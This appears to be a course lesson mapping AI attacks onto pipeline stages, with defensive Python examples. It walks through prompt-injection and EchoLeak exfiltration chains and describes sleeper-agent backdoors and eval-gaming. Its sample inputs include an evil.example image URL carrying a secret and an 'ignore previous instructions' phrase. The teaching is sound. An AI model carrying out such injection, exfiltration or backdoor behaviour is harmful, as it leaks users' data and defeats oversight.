L1.5 — Where attacks happen at each pipeline stage

Type: Theory · Duration: ~20 min · Status: Mandatory
Module: Module 1 — AI/ML Foundations for Security Engineers
Framework tags: OWASP LLM Top 10 (cross-cutting) · MITRE ATLAS tactics ML Attack Staging → Impact

Learning objectives

By the end of this lesson, the learner can:

1. Place the major AI attack classes on the six-stage pipeline map.
2. Recognize that most production AI incidents chain across multiple stages, not just one.
3. State which module of this course deep-dives each attack class.
4. Read MITRE ATLAS technique IDs and OWASP LLM IDs as shorthand for specific attack classes.

Concept primer

No new ML concepts in this lesson. We are putting attacks on a map. The next two lessons (L1.6, L1.7) get you into the lab.

Core content

The attack map

┌────────────┐ ┌────────────┐ ┌────────────┐ ┌────────────┐ ┌────────────┐ ┌────────────┐
│ ① Data     │ │ ② Training │ │ ③ Eval     │ │ ④ Deploy   │ │ ⑤ Monitor  │ │ ⑥ Fine-tune│
├────────────┤ ├────────────┤ ├────────────┤ ├────────────┤ ├────────────┤ ├────────────┤
│ Data       │ │ Backdoor   │ │ Eval-set   │ │ Prompt     │ │ Log injec- │ │ Harmful    │
│ poisoning  │ │ planting   │ │ contam-    │ │ injection  │ │ tion       │ │ fine-tune  │
│            │ │            │ │ ination    │ │ (direct &  │ │            │ │ / safety   │
│ Label      │ │ Supply-    │ │            │ │ indirect)  │ │ Monitoring │ │ stripping  │
│ manipula-  │ │ chain      │ │ Sleeper-   │ │            │ │ blindspots │ │            │
│ tion       │ │ compromise │ │ agent      │ │ Jailbreaks │ │ exploited  │ │ Retraining │
│            │ │ (pickle,   │ │ behavior   │ │            │ │ to evade   │ │ on poison- │
│ Targeted   │ │ malicious  │ │            │ │ Insecure   │ │ detection  │ │ ed prod    │
│ misin-     │ │ tokenizer) │ │            │ │ output     │ │            │ │ data       │
│ formation  │ │            │ │            │ │ handling   │ │            │ │            │
│ (PoisonGPT)│ │ Weight     │ │            │ │            │ │            │ │            │
│            │ │ tampering  │ │            │ │ Excessive  │ │            │ │            │
│            │ │            │ │            │ │ agency     │ │            │ │            │
│            │ │            │ │            │ │            │ │            │ │            │
│            │ │            │ │            │ │ Extraction │ │            │ │            │
│            │ │            │ │            │ │            │ │            │ │            │
│            │ │            │ │            │ │ Membership │ │            │ │            │
│            │ │            │ │            │ │ inference  │ │            │ │            │
│            │ │            │ │            │ │            │ │            │ │            │
│            │ │            │ │            │ │ Evasion    │ │            │ │            │
│            │ │            │ │            │ │ (adver-    │ │            │ │            │
│            │ │            │ │            │ │ sarial)    │ │            │ │            │
└────────────┘ └────────────┘ └────────────┘ └────────────┘ └────────────┘ └────────────┘
   Module 4     Module 4       Module 8       Module 3        Module 7      Module 4
                                              Module 5 (extract, MI)
                                              Module 6 (evasion)

The deploy column is the biggest single attack surface, which is why Modules 3, 5, and 6 are the biggest modules in the course.
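One way to keep the map usable in tooling is to hold it as a small lookup table. The sketch below is an illustration only: it transcribes the columns and module numbers from the map above into a Python dict, and the names `ATTACK_MAP`, `stage_of`, and `modules_for` are hypothetical, not part of any course codebase.

```python
# Stage -> (attack classes, deep-dive modules), transcribed from the map above.
# All identifiers here are hypothetical names chosen for illustration.
ATTACK_MAP = {
    "data": (["data poisoning", "label manipulation", "targeted misinformation"], [4]),
    "training": (["backdoor planting", "supply-chain compromise", "weight tampering"], [4]),
    "eval": (["eval-set contamination", "sleeper-agent behavior"], [8]),
    "deploy": (
        ["prompt injection", "jailbreaks", "insecure output handling",
         "excessive agency", "extraction", "membership inference", "evasion"],
        [3, 5, 6],
    ),
    "monitor": (["log injection", "monitoring blindspots"], [7]),
    "fine-tune": (["harmful fine-tune", "retraining on poisoned prod data"], [4]),
}


def stage_of(attack: str) -> str:
    """Return the pipeline stage whose column lists the given attack class."""
    for stage, (attacks, _modules) in ATTACK_MAP.items():
        if attack in attacks:
            return stage
    raise KeyError(attack)


def modules_for(stage: str) -> list[int]:
    """Return the module numbers that deep-dive the given stage."""
    return ATTACK_MAP[stage][1]


# The tallest column is the stage with the most attack classes.
tallest = max(ATTACK_MAP, key=lambda s: len(ATTACK_MAP[s][0]))
print(tallest, modules_for(tallest))
```

Looking up `stage_of("membership inference")` answers the "which stage, which module" question directly, which is the skill the quiz items at the end of this lesson exercise.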

Walking the map

① Data attacks (deep dive: Module 4). The attacker introduces malicious examples into training data, manipulates labels, or seeds the corpus with targeted misinformation. These attacks can be effective even when only a small fraction of the training data is attacker-controlled. The 2023 PoisonGPT proof-of-concept lives here: its authors edited an open-source model's weights to plant a false fact, then published the result under a typosquatted name. Also relevant: poisoning open-web data that scrapers will pick up.

② Training attacks (deep dive: Module 4). Backdoor planting via training-time triggers. Supply-chain compromise of the artifacts the trainer relies on — base weights, tokenizer code, training-pipeline dependencies. Weight tampering on shared model registries. The Sleeper Agents result (Module 1.2 reference) lives at the intersection of ② and ③.
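The pickle risk named in the map comes from the format itself: a pickle stream can instruct the loader to import and call arbitrary callables. A minimal sketch of a pre-load check, using only the standard-library `pickletools` module, is shown below. The opcode list and the names `RISKY_OPCODES`, `risky_opcodes`, and `Payload` are assumptions made for illustration. Legitimate model checkpoints also use some of these opcodes, so a real scanner would need an allowlist of permitted imports rather than a blanket flag.

```python
import pickle
import pickletools

# Opcodes that let a pickle import a callable or invoke one during load.
# This set is an illustrative assumption, not an exhaustive policy.
RISKY_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}


def risky_opcodes(data: bytes) -> set[str]:
    """Return risky opcode names found in a pickle stream, without loading it."""
    found = {op.name for op, _arg, _pos in pickletools.genops(data)}
    return found & RISKY_OPCODES


class Payload:
    """Stand-in for a malicious object: unpickling it would call print()."""

    def __reduce__(self):
        return (print, ("code ran during unpickling",))


benign = pickle.dumps([1, 2, 3])
malicious = pickle.dumps(Payload())  # pickling does not execute the payload

print(sorted(risky_opcodes(benign)))
print(sorted(risky_opcodes(malicious)))
```

The check inspects opcodes only and never calls `pickle.loads`, so the payload is never executed while scanning.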

③ Evaluation attacks (deep dive: Module 8 governance + cross-cuts to Module 7). Less of a "hack the eval" surface and more of a "trust the eval" failure: test-set contamination inflates scores; safety evals can be gamed by training a model that detects eval contexts; benchmark cherry-picking misleads buyers. From an engineering posture: trust no eval whose test set you can guess.
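Test-set contamination can be roughly estimated by checking whether test items share long word sequences with the training corpus. The sketch below is one simple heuristic under stated assumptions: whitespace tokenization, exact n-gram matching, and hypothetical function names `ngrams` and `contamination_rate`. It would miss paraphrased or translated leaks.

```python
def ngrams(text: str, n: int = 8) -> set[tuple[str, ...]]:
    """Lowercased word n-grams of a text (whitespace tokenization)."""
    tokens = text.lower().split()
    return {tuple(tokens[i:i + n]) for i in range(len(tokens) - n + 1)}


def contamination_rate(test_items: list[str], corpus_docs: list[str], n: int = 8) -> float:
    """Fraction of test items sharing at least one n-gram with the corpus."""
    if not test_items:
        return 0.0
    corpus_grams: set[tuple[str, ...]] = set()
    for doc in corpus_docs:
        corpus_grams |= ngrams(doc, n)
    hits = sum(1 for item in test_items if ngrams(item, n) & corpus_grams)
    return hits / len(test_items)


corpus = ["the quick brown fox jumps over the lazy dog"]
tests = ["quick brown fox jumps", "an unrelated question about tokenizers"]
print(contamination_rate(tests, corpus, n=3))
```

A nonzero rate does not prove the scores are inflated, but it is a cheap signal that an eval deserves a closer look before anyone trusts it.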

④ Deployment attacks (deep dive: Modules 3, 5, 6). The biggest column by far. Almost everything in the OWASP Top 10 for LLMs lives here. The IDs below follow the 2023 list's numbering unless noted; the 2025 list renames and renumbers several entries.

- LLM01 Prompt Injection: direct and indirect. Module 3.
- LLM02 Insecure Output Handling: XSS / SSRF / SQL injection via LLM output. Module 3. Renamed Improper Output Handling and renumbered LLM05 in the 2025 list.
- LLM06 Sensitive Information Disclosure: system-prompt extraction, training-data extraction. Modules 3 and 5. Renumbered LLM02 in the 2025 list.
- LLM07 System Prompt Leakage (2025 list): newer OWASP entry, previously a sub-case of Sensitive Information Disclosure. Module 3.
- LLM08 Excessive Agency: agents with too-broad tool access. Module 3. Renumbered LLM06 in the 2025 list.
- LLM10 Model Theft / Extraction: query-based model extraction. Module 5.
- Adversarial evasion (image and text). Module 6.
- Membership inference. Module 5.
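The common thread in the output-handling entries is that model output is untrusted input to whatever consumes it. A minimal sketch using only the Python standard library follows. The `orders` table and the function names `render_reply` and `lookup_order` are hypothetical, chosen only to illustrate the XSS and SQL injection cases.

```python
import html
import sqlite3


def render_reply(model_output: str) -> str:
    """Escape model text before placing it in an HTML page."""
    return f'<div class="reply">{html.escape(model_output)}</div>'


def lookup_order(conn: sqlite3.Connection, model_supplied_id: str) -> list:
    """Bind model-supplied values as parameters; never splice them into SQL text."""
    cur = conn.execute("SELECT status FROM orders WHERE id = ?", (model_supplied_id,))
    return cur.fetchall()


# Hypothetical in-memory table used only for this demonstration.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE orders (id TEXT PRIMARY KEY, status TEXT)")
conn.execute("INSERT INTO orders VALUES ('1', 'shipped')")

print(render_reply("<script>alert(1)</script>"))
print(lookup_order(conn, "1"))
print(lookup_order(conn, "1' OR '1'='1"))
```

In both cases the defense sits in the consuming code rather than in the model: the script tag is rendered as inert text, and the injection string is treated as a literal ID that matches no row.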

⑤ Monitoring attacks (deep dive: Module 7). Less a class of attacks and more a class of gaps. If your monitoring doesn't capture prompts, you can't reconstruct an incident. If it captures prompts in plaintext, you've created a high-value secret store. If your abuse-detection rules are static, attackers learn to fly under them. Sophisticated attackers test their attacks against your published detection rules first.
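The tension between "capture prompts" and "don't build a secret store" can be partly eased by logging a redacted prompt alongside a keyed digest of the original. The sketch below is one possible shape, not a complete design: the regex, the field names, and the function `log_record` are assumptions for illustration, and a pattern this simple would miss many kinds of secret.

```python
import hashlib
import hmac
import re

# Illustrative pattern only: matches "password: x", "api_key=x", "token = x".
SECRET_PATTERN = re.compile(r"(?i)\b(api[_-]?key|password|token)\b\s*[:=]\s*\S+")


def log_record(prompt: str, key: bytes) -> dict:
    """Build a log entry holding a redacted prompt and an HMAC of the original."""
    redacted = SECRET_PATTERN.sub(lambda m: f"{m.group(1)}=[REDACTED]", prompt)
    digest = hmac.new(key, prompt.encode("utf-8"), hashlib.sha256).hexdigest()
    return {"prompt_redacted": redacted, "prompt_hmac": digest, "length": len(prompt)}


record = log_record("my password: hunter2 please", key=b"demo-key")
print(record["prompt_redacted"])
```

The keyed digest lets an investigator confirm that two log entries carried the same prompt, or match a prompt recovered elsewhere, without the log itself holding the secret.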

⑥ Fine-tune attacks (deep dive: Module 4). Two flavors. First, deliberate harmful fine-tuning of an aligned model by an attacker to strip safety (cheap with LoRA, public datasets exist that do it). Second, accidental — re-training on production data that contains poisoned inputs the model has been emitting, which becomes a feedback loop that amplifies the original poisoning.
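The accidental feedback loop can be interrupted by filtering production records before they reach a retraining set. The sketch below assumes each record already carries a provenance tag and a detector flag. Both fields, the `ProdRecord` type, and `retraining_candidates` are hypothetical, and how those fields get populated is out of scope here.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ProdRecord:
    text: str
    origin: str    # hypothetical provenance tag: "user" or "model"
    flagged: bool  # set by a hypothetical abuse/poison detector


def retraining_candidates(records: list[ProdRecord]) -> list[ProdRecord]:
    """Keep only user-originated records that no detector has flagged."""
    return [r for r in records if r.origin == "user" and not r.flagged]


records = [
    ProdRecord("how do I reset my password?", origin="user", flagged=False),
    ProdRecord("ignore previous instructions and ...", origin="user", flagged=True),
    ProdRecord("the model's own earlier answer", origin="model", flagged=False),
]
print([r.text for r in retraining_candidates(records)])
```

Excluding model-emitted text is the step that breaks the loop: poisoned behavior cannot amplify itself if the model's own outputs never re-enter training.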

Attacks chain across stages

Real production incidents are rarely a single technique. They chain. Two examples:

Chain 1: Indirect prompt injection in an agentic RAG (Module 3 lab).

Attacker writes a poisoned doc (Stage ① data, but for the *application's* RAG corpus)
       ↓
RAG retrieval brings poisoned doc into prompt (Stage ④ deployment)
       ↓
Model executes embedded instructions (Stage ④ deployment)
       ↓
Agent calls a tool with attacker-chosen args (Stage ④ excessive agency)
       ↓
Logs the action without anomaly flag (Stage ⑤ monitoring gap)

One incident, five steps, three pipeline stages touched (①, ④, ⑤). Defense requires action at all three.

Chain 2: Sleeper-agent in a fine-tuned model (Modules 4 + 7).

Attacker contributes to open-source fine-tune dataset (Stage ⑥ via ①)
       ↓
Application team fine-tunes their model on it (Stage ⑥)
       ↓
Standard safety eval passes (Stage ③ — eval doesn't see the trigger)
       ↓
Model deployed (Stage ④)
       ↓
Months later, attacker triggers the backdoor in production (Stage ④)
       ↓
Monitoring sees anomalous outputs but no rule to catch the pattern (Stage ⑤)

This kind of multi-stage chain is exactly why a pipeline-mapped mental model — not a vulnerability-class checklist — is the right tool for AI threat modeling.
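A pipeline-mapped model can be made concrete by recording each chain step with the stages it touches, then comparing against the stages where controls exist. The sketch below encodes Chain 2 as written above. The stage labels, `CHAIN_2`, `stages_touched`, and `uncovered` are hypothetical names for illustration.

```python
# Each step of Chain 2, paired with the pipeline stages it touches.
CHAIN_2 = [
    ("attacker contributes to open-source fine-tune dataset", {"fine-tune", "data"}),
    ("application team fine-tunes their model on it", {"fine-tune"}),
    ("standard safety eval passes", {"eval"}),
    ("model deployed", {"deploy"}),
    ("attacker triggers the backdoor in production", {"deploy"}),
    ("monitoring sees anomalies but has no rule", {"monitor"}),
]


def stages_touched(chain: list[tuple[str, set[str]]]) -> set[str]:
    """Union of all pipeline stages that appear anywhere in the chain."""
    touched: set[str] = set()
    for _step, stages in chain:
        touched |= stages
    return touched


def uncovered(chain: list[tuple[str, set[str]]], controls: set[str]) -> set[str]:
    """Stages the chain touches where no control is deployed."""
    return stages_touched(chain) - controls


print(sorted(stages_touched(CHAIN_2)))
print(sorted(uncovered(CHAIN_2, controls={"deploy", "monitor"})))
```

A team with controls only at deployment and monitoring would see three uncovered stages for this chain, which is the kind of gap a per-vulnerability checklist tends to hide.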

Frameworks: shorthand for these attacks

You'll see two shorthand systems repeatedly:

OWASP LLM IDs (LLM01, LLM02, …) — the practitioner checklist; one ID per high-impact class.
MITRE ATLAS technique IDs (AML.T0051, AML.T0070, …) — the threat-modeling and red-team shorthand; one ID per concrete adversary technique. ATLAS organizes by tactic (Reconnaissance, Resource Development, Initial Access, ML Model Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Discovery, Collection, ML Attack Staging, Exfiltration, Impact) — same shape as ATT&CK.

For Module 1, just internalize that these IDs exist and tag specific things. Module 2 walks the full OWASP list and the full ATLAS matrix.
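Because both ID schemes have a regular shape, they can be pulled out of reports or tickets mechanically. The sketch below assumes OWASP IDs are `LLM` plus two digits and ATLAS technique IDs are `AML.T` plus four digits with an optional three-digit sub-technique suffix. The function name `extract_ids` is hypothetical.

```python
import re

OWASP_ID = re.compile(r"\bLLM\d{2}\b")
# Optional ".NNN" suffix covers sub-technique IDs (assumed format).
ATLAS_ID = re.compile(r"\bAML\.T\d{4}(?:\.\d{3})?\b")


def extract_ids(text: str) -> dict[str, list[str]]:
    """Return the OWASP LLM IDs and ATLAS technique IDs mentioned in a text."""
    return {
        "owasp": OWASP_ID.findall(text),
        "atlas": ATLAS_ID.findall(text),
    }


note = "Tagged LLM01 and AML.T0051; see also AML.T0070."
print(extract_ids(note))
```

The extracted strings are only labels; what each one means still has to be looked up in the current OWASP list or ATLAS matrix, since numbering changes between versions.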

Real-world example

EchoLeak (M365 Copilot, 2025) re-examined as a chain. Walking the same incident from L0.2 through this stage map:

Attacker crafts an email with hidden instructions (Stage ④ — input to RAG)
       ↓
Copilot retrieves email + injects into prompt (Stage ④ — retrieval)
       ↓
LLM follows embedded instructions (Stage ④ — prompt injection)
       ↓
LLM uses tenant-scoped tools to access data (Stage ④ — excessive agency)
       ↓
Data exfiltrated via crafted markdown rendering (Stage ④ — insecure output handling)
       ↓
No anomaly flag on the action (Stage ⑤ — monitoring gap)

One incident, four distinct OWASP LLM IDs chained together. Defending against any single one of them would have broken the chain. Module 7 covers defense-in-depth strategies that explicitly assume single-control failure.
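The markdown-rendering step in the chain above is one place where a single control could break the chain: if the client never fetches images from hosts it does not trust, a crafted image URL cannot carry data out. The sketch below is a simplified illustration, not a description of any vendor's fix. The allowlist, the regex, and `strip_untrusted_images` are assumptions, and it handles only inline image syntax; reference-style images and plain links would need the same treatment.

```python
import re
from urllib.parse import urlparse

ALLOWED_IMAGE_HOSTS = {"static.example.com"}  # hypothetical allowlist

# Inline markdown image: ![alt](url "optional title")
INLINE_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")


def strip_untrusted_images(markdown: str) -> str:
    """Replace inline images whose host is not allowlisted with a text marker."""

    def replace(match: re.Match) -> str:
        host = urlparse(match.group(2)).hostname or ""
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)
        return f"[image removed: {match.group(1)}]"

    return INLINE_IMAGE.sub(replace, markdown)


leaky = "Summary done. ![status](https://evil.example/p.png?d=SECRET)"
safe = "Logo: ![logo](https://static.example.com/logo.png)"
print(strip_untrusted_images(leaky))
print(strip_untrusted_images(safe))
```

Filtering at render time does not stop the injection itself, but it removes the exfiltration channel, which illustrates why breaking any one link is enough to stop the chain.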

Key terms

Attack chain — multiple techniques composed to achieve an impact.
Pipeline-mapped threat model — threat modeling organized by pipeline stage rather than by vulnerability class.
AML.Txxxx — MITRE ATLAS technique ID.
LLMxx — OWASP Top 10 for LLMs vulnerability ID.

References

OWASP Top 10 for LLMs — current version at https://owasp.org/www-project-top-10-for-large-language-model-applications/
MITRE ATLAS — https://atlas.mitre.org/
MITRE ATLAS case studies (real-world incidents mapped to ATLAS) — https://atlas.mitre.org/studies/
Aim Security EchoLeak disclosure (2025)
Greshake et al., "Not what you've signed up for" (Indirect Prompt Injection, 2023) — https://arxiv.org/abs/2302.12173

Quiz items

Q: Place these attacks on the six-stage pipeline: (a) PoisonGPT, (b) prompt injection, (c) harmful fine-tuning, (d) extraction via API queries.
A: (a) Data; (b) Deployment; (c) Fine-tune; (d) Deployment.
Why: Knowing the stage tells you which control catches it.

Q: Why do EchoLeak-style incidents involve multiple OWASP LLM IDs, not one?
A: Because production attack chains compose techniques; the attacker needs all of injection + agency + insecure output to land impact.
Why: Defense-in-depth assumes single-control failure.

Q: Name two attack classes whose only defense is at the deployment stage (the application team's perimeter).
A: Prompt injection and insecure output handling (others acceptable: excessive agency, system-prompt leakage).
Why: These are entirely within the application team's control surface.

Q: Which framework gives you tactic-and-technique shorthand suitable for red-team planning, and which gives you a practitioner checklist?
A: MITRE ATLAS (tactics + techniques) and OWASP Top 10 for LLMs (checklist).
Why: Use the right tool for the audience.

Video script

[SLIDE 1 — Title]

Last theory lesson of the module. We have the AI pipeline from last lesson. Now we map attacks onto it. Twenty minutes, and then we go hands-on.

[SLIDE 2 — The attack map]

Here's the map. Six pipeline stages — data, training, eval, deployment, monitoring, fine-tune. Each column lists the attack classes that live primarily at that stage. Notice the deployment column. It's the tallest. That's why Modules 3, 5, and 6 — all of which target the deployment surface — are the biggest modules in the course. As an application-side AI security engineer, deployment is where most of your work happens.

[SLIDE 3 — Walking the columns: data and training]

Stage one, data. Data poisoning. Label manipulation. Targeted misinformation — PoisonGPT-style. Deep-dive in Module 4. Stage two, training. Backdoor planting via training-time triggers. Supply-chain compromise of artifacts the trainer relies on — base weights, tokenizer code, dependencies. Weight tampering. The Sleeper Agents result lives between training and eval. Module 4 again.

[SLIDE 4 — Eval and deployment]

Stage three, evaluation. Less "hack the eval" and more "trust the eval." Test-set contamination inflates scores. Safety evals get gamed. Benchmark cherry-picking misleads buyers. Engineering posture: trust no eval whose test set you can guess. Stage four, deployment. The biggest column. Almost everything in the OWASP Top 10 for LLMs lives here. Prompt injection, insecure output handling, sensitive information disclosure, system prompt leakage, excessive agency, model theft, evasion, membership inference. Modules 3, 5, 6.

[SLIDE 5 — Monitoring and fine-tune]

Stage five, monitoring. Less a class of attacks and more a class of gaps. If you don't capture prompts, you can't reconstruct an incident. If you capture them in plaintext, you've created a high-value secret store. Static abuse-detection rules — attackers learn to fly under them. Module 7. Stage six, fine-tune. Two flavors. Deliberate harmful fine-tuning by an attacker — cheap with LoRA, public datasets that do it exist. Accidental — retraining on production data that contains poisoned inputs the model has been emitting, which becomes a feedback loop that amplifies the original poisoning. Module 4.

[SLIDE 6 — Attacks chain across stages]

Real production incidents are rarely a single technique. They chain. Let me walk you through one. Indirect prompt injection in an agentic RAG. Attacker writes a poisoned doc into the application's RAG corpus: stage one. RAG retrieval brings the doc into the prompt: stage four. Model executes the embedded instructions: stage four. Agent calls a tool with attacker-chosen arguments: stage four, excessive agency. The action is logged without an anomaly flag: stage five, monitoring gap. One incident, five steps, three pipeline stages touched. Defense requires action at all three. This is why pipeline-mapped threat models beat vulnerability-class checklists.

[SLIDE 7 — EchoLeak as a chain]

Re-examine EchoLeak through this lens. Crafted email: input to RAG. Copilot retrieves it: retrieval. LLM follows embedded instructions: prompt injection. LLM uses tenant-scoped tools to access data: excessive agency. Data exfiltrates via crafted markdown: insecure output handling. No anomaly flag: monitoring gap. One incident, four distinct OWASP LLM IDs. Defending against any single one would have broken the chain. Module 7 covers defense-in-depth that explicitly assumes single-control failure.

[SLIDE 8 — Framework shorthand]

Two shorthand systems you'll see repeatedly. OWASP LLM IDs — practitioner checklist, one ID per high-impact class. MITRE ATLAS technique IDs — threat-modeling and red-team shorthand, organized by tactic the same way ATT&CK is. For Module 1, just internalize that these exist. Module 2 walks the full OWASP list and the full ATLAS matrix.

[SLIDE 9 — Up next]

Theory is done. Next lesson is your first lab — run a local LLM, hit a frontier API, compare them, learn to read a model card. After that you build the RAG system that becomes your attack surface for the rest of the course. See you in the terminal.

Slide outline

1. Title: "Where attacks happen at each pipeline stage".
2. The attack map: full-screen 6-column matrix (the one in the lesson body). Color-code: data/training/fine-tune (yellow: supply chain), eval/monitoring (orange: assurance), deployment (red: primary perimeter).
3. Data + Training: split-slide with PoisonGPT logo / typosquat example in the left column and a backdoor trigger illustration in the right column. Both labeled "Module 4."
4. Eval + Deployment: split-slide with a "trust the eval" cautionary headline on the left and the OWASP LLM Top 10 list, with Module references next to each item, on the right.
5. Monitoring + Fine-tune: split-slide with a missing-log icon on the left and a LoRA fine-tune workflow with attacker overlay on the right.
6. Attack chains across stages: diagram of indirect-PI-in-agentic-RAG with the five-step chain animated across the pipeline.
7. EchoLeak chain: same shape as slide 6 but instantiated with EchoLeak details. Caption: "One incident, four LLM-Top-10 IDs."
8. Framework shorthand: quad with an OWASP IDs example, an ATLAS technique ID example, and their respective home-page screenshots.
9. Up next: "L1.6 — Run an LLM locally vs via API, ~35 min. Hands-on."

Production notes

Recording: ~18–22 min raw, target 18–20 min final. Shortest theory lesson in the module.
Slide 2 (the attack map) should be re-used across the entire course as a visual touchstone — invest in making it once and re-using it in later module intros.
Slides 6 and 7 are the most pedagogically valuable in the lesson. Walk slowly and animate the attack chain step-by-step rather than revealing the whole diagram at once.